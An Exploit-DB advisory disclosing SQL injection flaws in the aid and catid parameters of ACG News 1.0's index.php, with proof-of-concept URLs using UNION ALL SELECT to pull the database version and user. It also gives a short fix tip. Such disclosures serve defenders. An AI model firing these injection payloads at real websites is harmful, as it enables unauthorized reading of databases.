ACG News 1.0 aid/catid Remote SQL Injection Vulnerabilities

ID EDB-ID:4330
Type exploitdb
Reporter SmOk3
Modified 2007-08-28T00:00:00


ACG News 1.0 (aid/catid) Remote SQL Injection Vulnerabilities. CVE-2007-4603. Webapps exploit for php platform

                                            ACG News SQL Injection

Software: ACG News 1.0
Vendor link:
Vendor Demo link:
Attack: SQL Injection

Original Advisory:

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at >

SQL Injection
An attacker may execute arbitrary SQL statements on the vulnerable
system. This may compromise the integrity of your database and/or
expose sensitive information. Vulnerable variables are $aid and $catid
on index.php file.

Proof of Concept:
index.php?menu=showarticle&aid=[SQL INJECTION]
index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7

index.php?menu=showcat&catid=[SQL INJECTION]
index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version


Your script should filter metacharacters from user input.

Vendor contacted but I'm waiting for reply.

# [2007-08-28]